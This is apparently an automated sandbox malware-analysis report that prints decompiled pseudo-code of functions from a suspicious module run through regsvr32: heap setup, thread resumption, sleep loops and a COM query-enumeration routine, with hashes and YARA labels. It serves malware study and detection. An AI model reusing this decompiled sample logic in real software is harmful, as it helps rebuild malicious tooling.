                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1196160345-0
                                                                                                                                                                                              • Opcode ID: e4419585e7b7c0a013619d50bd8989b499db8488775a66b1178bc56466fba05b
                                                                                                                                                                                              • Instruction ID: af6313178b689de61efe919c3694fa2df16f4cb308132502ceb0fc41556ba6c5
                                                                                                                                                                                              • Opcode Fuzzy Hash: e4419585e7b7c0a013619d50bd8989b499db8488775a66b1178bc56466fba05b
                                                                                                                                                                                              • Instruction Fuzzy Hash: 18011A31744202CED725EFE8AE08AE677E8FB56315F0582B6F6058B121D77468839BA1
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 04AFC879 Relevance: 1.5, APIs: 1, Instructions: 34COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                              			E04AFC879(void* __ecx) {
				signed int _v8;
				intOrPtr _t12;
				void* _t13;
				void* _t14;
				void* _t17;
				intOrPtr _t18;
				void* _t23;

				_v8 = _v8 & 0x00000000;
				_t12 =  *0x4b0f820; // 0x4c2faa0
				_t13 =  *((intOrPtr*)(_t12 + 0x70))(__ecx, 8,  &_v8, __ecx);
				if(_t13 != 0) {
					_t14 = E04AFC862(); // executed
					_t23 = _t14;
					if(_t23 != 0) {
						FindCloseChangeNotification(_v8);
						_t17 = _t23;
					} else {
						if(_v8 != _t14) {
							_t18 =  *0x4b0f818; // 0x4c2f8b0
							 *((intOrPtr*)(_t18 + 0x30))(_v8);
						}
						_t17 = 0;
					}
					return _t17;
				} else {
					return _t13;
				}
			}










                                                                                                                                                                                              0x04afc87d
                                                                                                                                                                                              0x04afc885
                                                                                                                                                                                              0x04afc88d
                                                                                                                                                                                              0x04afc892
                                                                                                                                                                                              0x04afc89a
                                                                                                                                                                                              0x04afc89f
                                                                                                                                                                                              0x04afc8a3
                                                                                                                                                                                              0x04afc8c1
                                                                                                                                                                                              0x04afc8c4
                                                                                                                                                                                              0x04afc8a5
                                                                                                                                                                                              0x04afc8a8
                                                                                                                                                                                              0x04afc8aa
                                                                                                                                                                                              0x04afc8b2
                                                                                                                                                                                              0x04afc8b2
                                                                                                                                                                                              0x04afc8b5
                                                                                                                                                                                              0x04afc8b5
                                                                                                                                                                                              0x04afc8c8
                                                                                                                                                                                              0x04afc895
                                                                                                                                                                                              0x04afc895
                                                                                                                                                                                              0x04afc895

                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001D.00000002.677381377.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_29_2_4af0000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                              • Opcode ID: ed36a67daa86271e47bd40c67462fdb8957476b030251bc4af01dbae05a0ab59
                                                                                                                                                                                              • Instruction ID: 920d08a1ccd3dc3c0363ae3d28bacc82cd7b20caffbd956dee0e529bc2ed42da
                                                                                                                                                                                              • Opcode Fuzzy Hash: ed36a67daa86271e47bd40c67462fdb8957476b030251bc4af01dbae05a0ab59
                                                                                                                                                                                              • Instruction Fuzzy Hash: 5DF01732B10208EBEB21DBA6DD05A9D73F8FB08656F4141A5F601E7161DB75EE00ABA0
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 04AF632E Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                              			E04AF632E() {
				intOrPtr _t3;

				_t3 =  *0x4b0f818; // 0x4c2f8b0
				 *((intOrPtr*)(_t3 + 0x2c))( *0x4b0f83c, 0xffffffff);
				ExitProcess(0);
			}




                                                                                                                                                                                              0x04af632e
                                                                                                                                                                                              0x04af633b
                                                                                                                                                                                              0x04af6345

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • ExitProcess.KERNEL32(00000000), ref: 04AF6345
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001D.00000002.677381377.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_29_2_4af0000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ExitProcess
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 621844428-0
                                                                                                                                                                                              • Opcode ID: 9ac74b8c180d77bc2be044317cdba5a7316c96b4834544949bc1e764a7553b1e
                                                                                                                                                                                              • Instruction ID: d3abb38864314357ef166303e48fb24b1b5238f9bbcd8db709fd9f8bb03799fd
                                                                                                                                                                                              • Opcode Fuzzy Hash: 9ac74b8c180d77bc2be044317cdba5a7316c96b4834544949bc1e764a7553b1e
                                                                                                                                                                                              • Instruction Fuzzy Hash: 3DC00271314210DFC7609B64E849FA437E4FB19323F1187A2F529DB1F5CBA498819B60
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 04AF8BDE Relevance: 1.5, APIs: 1, Instructions: 8memoryCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                              			E04AF8BDE(long _a4) {
				void* _t2;

				_t2 = RtlAllocateHeap( *0x4b0f900, 8, _a4); // executed
				return _t2;
			}




                                                                                                                                                                                              0x04af8bec
                                                                                                                                                                                              0x04af8bf3

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000008,?,?,04AF959D,00000100,?,04AF6507), ref: 04AF8BEC
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001D.00000002.677381377.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_29_2_4af0000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AllocateHeap
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1279760036-0
                                                                                                                                                                                              • Opcode ID: a7a751b9311a54c2abafade80c8c4ab2aecf1d8ce514020a8b9e46444cd50372
                                                                                                                                                                                              • Instruction ID: 78ea743546f76f8188e68738e8e0b59cf08c99512defeea56f9bd11aa36eb6d4
                                                                                                                                                                                              • Opcode Fuzzy Hash: a7a751b9311a54c2abafade80c8c4ab2aecf1d8ce514020a8b9e46444cd50372
                                                                                                                                                                                              • Instruction Fuzzy Hash: 7AB0923118020CBBCB111AA1EC05B943F29F724656F004012F60C06061DBA6A8A09BA0
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 04AFDA57 Relevance: 1.5, APIs: 1, Instructions: 7threadCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 58%
                                                                                                                                                                                              			E04AFDA57(void* __ecx) {
				signed int _t4;

				_t4 = ResumeThread( *(__ecx + 4));
				asm("sbb eax, eax");
				return  ~_t4 & 0x00000001;
			}




                                                                                                                                                                                              0x04afda5f
                                                                                                                                                                                              0x04afda67
                                                                                                                                                                                              0x04afda6c

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • ResumeThread.KERNELBASE(?,04AFD8C2,?,?,00000001), ref: 04AFDA5F
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001D.00000002.677381377.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_29_2_4af0000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ResumeThread
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 947044025-0
                                                                                                                                                                                              • Opcode ID: 3cdcf155b5d803fa55687658410d86d727dfe7aded731c3f138b5941f13db6ff
                                                                                                                                                                                              • Instruction ID: 442742d73c2ca176a02c37712f3fd9339a8cd7604f24117926b68b5d0da47866
                                                                                                                                                                                              • Opcode Fuzzy Hash: 3cdcf155b5d803fa55687658410d86d727dfe7aded731c3f138b5941f13db6ff
                                                                                                                                                                                              • Instruction Fuzzy Hash: 56B092323A00019BCB104B74E80B9E03BE0FB66606798C2F0A005C6061C36EC8868A80
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 04AF8BC9 Relevance: 1.5, APIs: 1, Instructions: 6memoryCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                              			E04AF8BC9() {
				void* _t1;

				_t1 = HeapCreate(0, 0x96000, 0); // executed
				 *0x4b0f900 = _t1;
				return _t1;
			}




                                                                                                                                                                                              0x04af8bd2
                                                                                                                                                                                              0x04af8bd8
                                                                                                                                                                                              0x04af8bdd

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • HeapCreate.KERNELBASE(00000000,00096000,00000000,04AF6502), ref: 04AF8BD2
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001D.00000002.677381377.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_29_2_4af0000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CreateHeap
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 10892065-0
                                                                                                                                                                                              • Opcode ID: 9a1f3ca122a63c49790a352ff3b43a351f2dea059dbb5fb4ad3a403213d6401e
                                                                                                                                                                                              • Instruction ID: db83f74515beaaeb26711903e116fbed0b1f438ce6fff11c55a54d286ae3755a
                                                                                                                                                                                              • Opcode Fuzzy Hash: 9a1f3ca122a63c49790a352ff3b43a351f2dea059dbb5fb4ad3a403213d6401e
                                                                                                                                                                                              • Instruction Fuzzy Hash: 7CB012B03813006AD6200B205C06B013510E3A0B03F104002B6059A1C0E7E464809524
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 04AFDA6D Relevance: 1.3, APIs: 1, Instructions: 50sleepCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 91%
                                                                                                                                                                                              			E04AFDA6D(void* __ecx, intOrPtr _a4, signed int _a8) {
				signed int _v8;
				intOrPtr _v12;
				signed int _t26;
				signed int _t28;
				signed int* _t36;
				signed int* _t39;

				_push(__ecx);
				_push(__ecx);
				_t36 = _a8;
				_t28 = _t36[1];
				if(_t28 != 0) {
					_t39 = _t36[2];
					do {
						_a8 = _a8 & 0x00000000;
						if(_t39[2] > 0) {
							_t31 = _t39[3];
							_t22 = _a4 + 0x24;
							_v12 = _a4 + 0x24;
							_v8 = _t39[3];
							while(E04AFA0A3(_t22,  *_t31) != 0) {
								_t26 = _a8 + 1;
								_t31 = _v8 + 4;
								_a8 = _t26;
								_t22 = _v12;
								_v8 = _v8 + 4;
								if(_t26 < _t39[2]) {
									continue;
								} else {
								}
								goto L8;
							}
							 *_t36 =  *_t36 |  *_t39;
						}
						L8:
						_t39 =  &(_t39[4]);
						_t28 = _t28 - 1;
					} while (_t28 != 0);
				}
				Sleep(0xa);
				return 1;
			}









                                                                                                                                                                                              0x04afda70
                                                                                                                                                                                              0x04afda71
                                                                                                                                                                                              0x04afda74
                                                                                                                                                                                              0x04afda77
                                                                                                                                                                                              0x04afda7c
                                                                                                                                                                                              0x04afda7f
                                                                                                                                                                                              0x04afda82
                                                                                                                                                                                              0x04afda82
                                                                                                                                                                                              0x04afda8a
                                                                                                                                                                                              0x04afda8f
                                                                                                                                                                                              0x04afda92
                                                                                                                                                                                              0x04afda95
                                                                                                                                                                                              0x04afda98
                                                                                                                                                                                              0x04afda9b
                                                                                                                                                                                              0x04afdaae
                                                                                                                                                                                              0x04afdaaf
                                                                                                                                                                                              0x04afdab2
                                                                                                                                                                                              0x04afdab8
                                                                                                                                                                                              0x04afdabb
                                                                                                                                                                                              0x04afdabe
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04afdac0
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04afdabe
                                                                                                                                                                                              0x04afdac4
                                                                                                                                                                                              0x04afdac4
                                                                                                                                                                                              0x04afdac6
                                                                                                                                                                                              0x04afdac6
                                                                                                                                                                                              0x04afdac9
                                                                                                                                                                                              0x04afdac9
                                                                                                                                                                                              0x04afdace
                                                                                                                                                                                              0x04afdad6
                                                                                                                                                                                              0x04afdae2

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • Sleep.KERNELBASE(0000000A), ref: 04AFDAD6
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001D.00000002.677381377.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_29_2_4af0000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Sleep
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3472027048-0
                                                                                                                                                                                              • Opcode ID: c0adda7d6bedeaff4cad0b505c85fde190304832d09147f2a1a1ea4e9e390683
                                                                                                                                                                                              • Instruction ID: 0bbfcef140870e41af3b159124bb20acb713da4893664777a9c97adac597bd79
                                                                                                                                                                                              • Opcode Fuzzy Hash: c0adda7d6bedeaff4cad0b505c85fde190304832d09147f2a1a1ea4e9e390683
                                                                                                                                                                                              • Instruction Fuzzy Hash: 42115B31A04305EFEB11DFA9C984AA9B7E8FB88324F148469E99A9B300D370F940CB44
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Non-executed Functions

                                                                                                                                                                                              Function 04AFEA4A Relevance: 24.9, APIs: 12, Strings: 2, Instructions: 388memoryCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 50%
                                                                                                                                                                                              			E04AFEA4A(intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4) {
				signed int _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				void* _v28;
				signed int _v32;
				char _v36;
				intOrPtr _v40;
				signed int _v44;
				char _v48;
				char _v52;
				intOrPtr _v56;
				signed int _v60;
				char* _v72;
				signed short _v80;
				signed int _v84;
				char _v88;
				char _v92;
				char _v96;
				intOrPtr _v100;
				char _v104;
				char _v616;
				intOrPtr* _t159;
				char _t165;
				signed int _t166;
				signed int _t173;
				signed int _t178;
				signed int _t186;
				intOrPtr* _t187;
				signed int _t188;
				signed int _t192;
				intOrPtr* _t193;
				intOrPtr _t200;
				intOrPtr* _t205;
				signed int _t207;
				signed int _t209;
				intOrPtr* _t210;
				intOrPtr _t212;
				intOrPtr* _t213;
				signed int _t214;
				char _t217;
				signed int _t218;
				signed int _t219;
				signed int _t230;
				signed int _t235;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				intOrPtr* _t247;
				intOrPtr* _t251;
				signed int _t252;
				intOrPtr* _t253;
				void* _t255;
				intOrPtr* _t261;
				signed int _t262;
				signed int _t283;
				signed int _t289;
				char* _t298;
				void* _t320;
				signed int _t322;
				intOrPtr* _t323;
				intOrPtr _t324;
				signed int _t327;
				intOrPtr* _t328;
				intOrPtr* _t329;

				_v32 = _v32 & 0x00000000;
				_v60 = _v60 & 0x00000000;
				_v56 = __edx;
				_v100 = __ecx;
				_t159 = E04AFE400(__ecx);
				_t251 = _t159;
				_v104 = _t251;
				if(_t251 == 0) {
					return _t159;
				}
				_t320 = E04AF8BDE(0x10);
				_v36 = _t320;
				_pop(_t255);
				if(_t320 == 0) {
					L53:
					E04AF8BF4( &_v60, 0xfffffffe);
					E04AFE4B4( &_v104);
					return _t320;
				}
				_t165 = E04AF9DF2(_t255, 0x3a7);
				 *_t328 = 0xae7;
				_v52 = _t165;
				_t166 = E04AF9DF2(_t255);
				_push(0);
				_push(_v56);
				_v20 = _t166;
				_push(_t166);
				_push(_a4);
				_t322 = E04AF9A5A(_t165);
				_v60 = _t322;
				E04AF8BAF( &_v52);
				E04AF8BAF( &_v20);
				_t329 = _t328 + 0x20;
				if(_t322 != 0) {
					_t323 = __imp__#2;
					_v40 =  *_t323(_t322);
					_t173 = E04AF9DF2(_t255, 0x886);
					_v20 = _t173;
					_v52 =  *_t323(_t173);
					E04AF8BAF( &_v20);
					_t324 = _v40;
					_t261 =  *_t251;
					_t252 = 0;
					_t178 =  *((intOrPtr*)( *_t261 + 0x50))(_t261, _v52, _t324, 0, 0,  &_v32);
					__eflags = _t178;
					if(_t178 != 0) {
						L52:
						__imp__#6(_t324);
						__imp__#6(_v52);
						goto L53;
					}
					_t262 = _v32;
					_v28 = 0;
					_v20 = 0;
					__eflags = _t262;
					if(_t262 == 0) {
						L49:
						 *((intOrPtr*)( *_t262 + 8))(_t262);
						__eflags = _t252;
						if(_t252 == 0) {
							E04AF8BF4( &_v36, 0);
							_t320 = _v36;
						} else {
							 *(_t320 + 8) = _t252;
							 *_t320 = E04AF98BD(_v100);
							 *((intOrPtr*)(_t320 + 4)) = E04AF98BD(_v56);
						}
						goto L52;
					} else {
						goto L6;
					}
					while(1) {
						L6:
						_t186 =  *((intOrPtr*)( *_t262 + 0x10))(_t262, 0xea60, 1,  &_v28,  &_v84);
						__eflags = _t186;
						if(_t186 != 0) {
							break;
						}
						_v16 = 0;
						_v48 = 0;
						_v12 = 0;
						_v24 = 0;
						__eflags = _v84;
						if(_v84 == 0) {
							break;
						}
						_t187 = _v28;
						_t188 =  *((intOrPtr*)( *_t187 + 0x1c))(_t187, 0, 0x40, 0,  &_v24);
						__eflags = _t188;
						if(_t188 >= 0) {
							__imp__#20(_v24, 1,  &_v16);
							__imp__#19(_v24, 1,  &_v48);
							_t46 = _t320 + 0xc; // 0xc
							_t253 = _t46;
							_t327 = _t252 << 3;
							_t47 = _t327 + 8; // 0x8
							_t192 = E04AF8C72(_t327, _t47);
							__eflags = _t192;
							if(_t192 == 0) {
								__imp__#16(_v24);
								_t193 = _v28;
								 *((intOrPtr*)( *_t193 + 8))(_t193);
								L46:
								_t252 = _v20;
								break;
							}
							 *(_t327 +  *_t253) = _v48 - _v16 + 1;
							 *((intOrPtr*)(_t327 +  *_t253 + 4)) = E04AF8BDE( *(_t327 +  *_t253) << 3);
							_t200 =  *_t253;
							__eflags =  *(_t327 + _t200 + 4);
							if( *(_t327 + _t200 + 4) == 0) {
								_t136 = _t320 + 0xc; // 0xc
								E04AF8BF4(_t136, 0);
								E04AF8BF4( &_v36, 0);
								__imp__#16(_v24);
								_t205 = _v28;
								 *((intOrPtr*)( *_t205 + 8))(_t205);
								_t320 = _v36;
								goto L46;
							}
							_t207 = _v16;
							while(1) {
								_v12 = _t207;
								__eflags = _t207 - _v48;
								if(_t207 > _v48) {
									break;
								}
								_v44 = _v44 & 0x00000000;
								_t209 =  &_v12;
								__imp__#25(_v24, _t209,  &_v44);
								__eflags = _t209;
								if(_t209 < 0) {
									break;
								}
								_t212 = E04AF98BD(_v44);
								 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + (_v12 - _v16) * 8)) = _t212;
								_t213 = _v28;
								_t281 =  *_t213;
								_t214 =  *((intOrPtr*)( *_t213 + 0x10))(_t213, _v44, 0,  &_v80, 0, 0);
								__eflags = _t214;
								if(_t214 < 0) {
									L39:
									__imp__#6(_v44);
									_t207 = _v12 + 1;
									__eflags = _t207;
									continue;
								}
								_v92 = E04AF9DF2(_t281, 0xb28);
								 *_t329 = 0x83f;
								_t217 = E04AF9DF2(_t281);
								_t283 = _v80;
								_v96 = _t217;
								_t218 = _t283 & 0x0000ffff;
								__eflags = _t218 - 0xb;
								if(__eflags > 0) {
									_t219 = _t218 - 0x10;
									__eflags = _t219;
									if(_t219 == 0) {
										L35:
										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E04AF8BDE(0x18);
										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
										__eflags = _t289;
										if(_t289 == 0) {
											L38:
											E04AF8BAF( &_v92);
											E04AF8BAF( &_v96);
											__imp__#9( &_v80);
											goto L39;
										}
										_push(_v72);
										_push(L"%d");
										L37:
										_push(0xc);
										_push(_t289);
										E04AF9E51();
										_t329 = _t329 + 0x10;
										goto L38;
									}
									_t230 = _t219 - 1;
									__eflags = _t230;
									if(_t230 == 0) {
										L33:
										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E04AF8BDE(0x18);
										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
										__eflags = _t289;
										if(_t289 == 0) {
											goto L38;
										}
										_push(_v72);
										_push(L"%u");
										goto L37;
									}
									_t235 = _t230 - 1;
									__eflags = _t235;
									if(_t235 == 0) {
										goto L33;
									}
									__eflags = _t235 == 1;
									if(_t235 == 1) {
										goto L33;
									}
									L28:
									__eflags = _t283 & 0x00002000;
									if((_t283 & 0x00002000) == 0) {
										_v88 = E04AF9DF2(_t283, 0xe0a);
										E04AF9E51( &_v616, 0x100, _t237, _v80 & 0x0000ffff);
										E04AF8BAF( &_v88);
										_t329 = _t329 + 0x18;
										_t298 =  &_v616;
										L31:
										_t242 = E04AF98BD(_t298);
										L32:
										 *( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8) = _t242;
										goto L38;
									}
									_t242 = E04AFE92E( &_v80);
									goto L32;
								}
								if(__eflags == 0) {
									__eflags = _v72 - 0xffff;
									_t298 = L"TRUE";
									if(_v72 != 0xffff) {
										_t298 = L"FALSE";
									}
									goto L31;
								}
								_t243 = _t218 - 1;
								__eflags = _t243;
								if(_t243 == 0) {
									goto L38;
								}
								_t244 = _t243 - 1;
								__eflags = _t244;
								if(_t244 == 0) {
									goto L35;
								}
								_t245 = _t244 - 1;
								__eflags = _t245;
								if(_t245 == 0) {
									goto L35;
								}
								__eflags = _t245 != 5;
								if(_t245 != 5) {
									goto L28;
								}
								_t298 = _v72;
								goto L31;
							}
							__imp__#16(_v24);
							_t210 = _v28;
							 *((intOrPtr*)( *_t210 + 8))(_t210);
							_t252 = _v20;
							L42:
							_t262 = _v32;
							_t252 = _t252 + 1;
							_v20 = _t252;
							__eflags = _t262;
							if(_t262 != 0) {
								continue;
							}
							L48:
							_t324 = _v40;
							goto L49;
						}
						_t247 = _v28;
						 *((intOrPtr*)( *_t247 + 8))(_t247);
						goto L42;
					}
					_t262 = _v32;
					goto L48;
				} else {
					E04AF8BF4( &_v36, _t322);
					_t320 = _v36;
					goto L53;
				}
			}





































































                                                                                                                                                                                              0x04afea53
                                                                                                                                                                                              0x04afea59
                                                                                                                                                                                              0x04afea60
                                                                                                                                                                                              0x04afea63
                                                                                                                                                                                              0x04afea66
                                                                                                                                                                                              0x04afea6b
                                                                                                                                                                                              0x04afea6d
                                                                                                                                                                                              0x04afea72
                                                                                                                                                                                              0x04afeeba
                                                                                                                                                                                              0x04afeeba
                                                                                                                                                                                              0x04afea7f
                                                                                                                                                                                              0x04afea81
                                                                                                                                                                                              0x04afea84
                                                                                                                                                                                              0x04afea87
                                                                                                                                                                                              0x04afee9f
                                                                                                                                                                                              0x04afeea5
                                                                                                                                                                                              0x04afeeaf
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04afeeb4
                                                                                                                                                                                              0x04afea92
                                                                                                                                                                                              0x04afea99
                                                                                                                                                                                              0x04afeaa0
                                                                                                                                                                                              0x04afeaa3
                                                                                                                                                                                              0x04afeaa8
                                                                                                                                                                                              0x04afeaaa
                                                                                                                                                                                              0x04afeaad
                                                                                                                                                                                              0x04afeab0
                                                                                                                                                                                              0x04afeab1
                                                                                                                                                                                              0x04afeaba
                                                                                                                                                                                              0x04afeac0
                                                                                                                                                                                              0x04afeac3
                                                                                                                                                                                              0x04afeacc
                                                                                                                                                                                              0x04afead1
                                                                                                                                                                                              0x04afead6
                                                                                                                                                                                              0x04afeaed
                                                                                                                                                                                              0x04afeafa
                                                                                                                                                                                              0x04afeafd
                                                                                                                                                                                              0x04afeb04
                                                                                                                                                                                              0x04afeb09
                                                                                                                                                                                              0x04afeb10
                                                                                                                                                                                              0x04afeb15
                                                                                                                                                                                              0x04afeb1c
                                                                                                                                                                                              0x04afeb1e
                                                                                                                                                                                              0x04afeb2a
                                                                                                                                                                                              0x04afeb2d
                                                                                                                                                                                              0x04afeb2f
                                                                                                                                                                                              0x04afee8f
                                                                                                                                                                                              0x04afee90
                                                                                                                                                                                              0x04afee99
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04afee99
                                                                                                                                                                                              0x04afeb35
                                                                                                                                                                                              0x04afeb38
                                                                                                                                                                                              0x04afeb3b
                                                                                                                                                                                              0x04afeb3e
                                                                                                                                                                                              0x04afeb40
                                                                                                                                                                                              0x04afee5b
                                                                                                                                                                                              0x04afee5e
                                                                                                                                                                                              0x04afee61
                                                                                                                                                                                              0x04afee63
                                                                                                                                                                                              0x04afee85
                                                                                                                                                                                              0x04afee8a
                                                                                                                                                                                              0x04afee65
                                                                                                                                                                                              0x04afee68
                                                                                                                                                                                              0x04afee73
                                                                                                                                                                                              0x04afee7a
                                                                                                                                                                                              0x04afee7a
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04afeb46
                                                                                                                                                                                              0x04afeb46
                                                                                                                                                                                              0x04afeb58
                                                                                                                                                                                              0x04afeb5b
                                                                                                                                                                                              0x04afeb5d
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04afeb65
                                                                                                                                                                                              0x04afeb68
                                                                                                                                                                                              0x04afeb6b
                                                                                                                                                                                              0x04afeb6e
                                                                                                                                                                                              0x04afeb71
                                                                                                                                                                                              0x04afeb74
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04afeb7a
                                                                                                                                                                                              0x04afeb88
                                                                                                                                                                                              0x04afeb8b
                                                                                                                                                                                              0x04afeb8d
                                                                                                                                                                                              0x04afeba6
                                                                                                                                                                                              0x04afebb5
                                                                                                                                                                                              0x04afebbd
                                                                                                                                                                                              0x04afebbd
                                                                                                                                                                                              0x04afebc0
                                                                                                                                                                                              0x04afebc7
                                                                                                                                                                                              0x04afebcb
                                                                                                                                                                                              0x04afebd1
                                                                                                                                                                                              0x04afebd3
                                                                                                                                                                                              0x04afee43
                                                                                                                                                                                              0x04afee49
                                                                                                                                                                                              0x04afee4f
                                                                                                                                                                                              0x04afee52
                                                                                                                                                                                              0x04afee52
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04afee52
                                                                                                                                                                                              0x04afebe2
                                                                                                                                                                                              0x04afebf6
                                                                                                                                                                                              0x04afebfa
                                                                                                                                                                                              0x04afebfc
                                                                                                                                                                                              0x04afec01
                                                                                                                                                                                              0x04afee10
                                                                                                                                                                                              0x04afee16
                                                                                                                                                                                              0x04afee21
                                                                                                                                                                                              0x04afee2c
                                                                                                                                                                                              0x04afee32
                                                                                                                                                                                              0x04afee38
                                                                                                                                                                                              0x04afee3b
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04afee3b
                                                                                                                                                                                              0x04afec07
                                                                                                                                                                                              0x04afedde
                                                                                                                                                                                              0x04afedde
                                                                                                                                                                                              0x04afede1
                                                                                                                                                                                              0x04afede4
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04afec0f
                                                                                                                                                                                              0x04afec17
                                                                                                                                                                                              0x04afec1e
                                                                                                                                                                                              0x04afec24
                                                                                                                                                                                              0x04afec26
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04afec2f
                                                                                                                                                                                              0x04afec44
                                                                                                                                                                                              0x04afec4a
                                                                                                                                                                                              0x04afec53
                                                                                                                                                                                              0x04afec56
                                                                                                                                                                                              0x04afec59
                                                                                                                                                                                              0x04afec5b
                                                                                                                                                                                              0x04afedd1
                                                                                                                                                                                              0x04afedd4
                                                                                                                                                                                              0x04afeddd
                                                                                                                                                                                              0x04afeddd
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x04afeddd
                                                                                                                                                                                              0x04afec6b
                                                                                                                                                                                              0x04afec6e
                                                                                                                                                                                              0x04afec75
                                                                                                                                                                                              0x04afec7b
                                                                                                                                                                                              0x04afec7e
